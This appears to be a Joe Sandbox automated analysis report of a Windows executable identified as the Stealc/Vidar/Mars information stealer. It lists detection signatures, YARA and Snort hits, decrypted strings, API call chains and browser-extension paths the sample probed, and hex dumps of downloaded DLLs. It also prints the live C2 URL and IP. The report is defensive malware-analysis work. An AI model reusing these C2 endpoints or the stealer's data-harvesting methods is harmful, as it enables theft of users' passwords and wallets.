Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FFAk2gixx5.exe

Overview

General Information

Sample name:FFAk2gixx5.exe
renamed because original name is a hash value
Original sample name:14cd6d9cbad80b0e4076212bf7ad937f.exe
Analysis ID:1436574
MD5:14cd6d9cbad80b0e4076212bf7ad937f
SHA1:6f553fad2fd973d52dec55582490eb8c3a35b6e1
SHA256:1738d5ec9cf4a62d3bebdb8690d208dc4e9bb957ba427233920a2195b04bb52e
Tags:exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FFAk2gixx5.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\FFAk2gixx5.exe" MD5: 14CD6D9CBAD80B0E4076212BF7AD937F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "http://okkolus.com/cf5cbdf706840b3f.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
        00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x1208:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.FFAk2gixx5.exe.2fc0e67.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.FFAk2gixx5.exe.2fc0e67.2.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                0.2.FFAk2gixx5.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.FFAk2gixx5.exe.400000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                    0.3.FFAk2gixx5.exe.2ff0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 7 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:05/06/24-02:52:39.695594
                      SID:2051831
                      Source Port:80
                      Destination Port:49708
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/06/24-02:52:38.714464
                      SID:2044244
                      Source Port:49707
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/06/24-02:52:39.070096
                      SID:2051828
                      Source Port:80
                      Destination Port:49707
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/06/24-02:52:39.336133
                      SID:2044246
                      Source Port:49708
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/06/24-02:52:38.047891
                      SID:2044243
                      Source Port:49706
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://okkolus.com/cf5cbdf706840b3f.phpAvira URL Cloud: Label: malware
                      Source: http://okkolus.com/cf5cbdf706840b3f.php/MAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://okkolus.com/cf5cbdf706840b3f.php"}
                      Multi AV Scanner detection for domain / URL
                      Source: okkolus.comVirustotal: Detection: 10%Perma Link
                      Source: http://okkolus.comVirustotal: Detection: 10%Perma Link
                      Source: http://okkolus.com/cf5cbdf706840b3f.phpVirustotal: Detection: 13%Perma Link
                      Source: http://okkolus.com/dfaf16606234b71d/nss3.dlleVirustotal: Detection: 5%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: FFAk2gixx5.exeReversingLabs: Detection: 71%
                      Source: FFAk2gixx5.exeVirustotal: Detection: 68%Perma Link
                      Machine Learning detection for sample
                      Source: FFAk2gixx5.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: CtIvEWInDoW
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: AgEBOxw
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: OsUse
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: }@@@e$@@
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: ijklmnopqrs
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: L 45`vy`ty`tx`sp@@@@<@@@
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: >22lmnopq((\]^_`abcdefghijklmnopqrs
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: %s\%_
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: %s\%]
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: ijklmnopqrs
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: [EGEKM^Ywxyztasc}567y9n/S
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: jAss}ord
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: '!#!/!#{|}
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: `o^UFF
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: {K}ri*#
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: advapi32.dll
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: HeapFree
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: GetLocaleInfoA
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: ntProcessId
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: wininet.dll
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: shlwapi.dll
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: shell32.dll
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: .dll
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: khrc7C9Pm
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: column_text
                      Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpackString decryptor: login:
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00415590 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FC6E77 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD57F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FC97A7 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FC9707 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCC1F7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeUnpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack
                      Source: FFAk2gixx5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                      Source: Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49706 -> 31.41.44.147:80
                      Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49707 -> 31.41.44.147:80
                      Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 31.41.44.147:80 -> 192.168.2.6:49707
                      Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49708 -> 31.41.44.147:80
                      Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 31.41.44.147:80 -> 192.168.2.6:49708
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://okkolus.com/cf5cbdf706840b3f.php
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 18:30:30 GMTETag: "10e436-5e7f2463c1d80"Accept-Ranges: bytesContent-Length: 1106998Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "a7550-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 685392Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "94750-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 608080Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 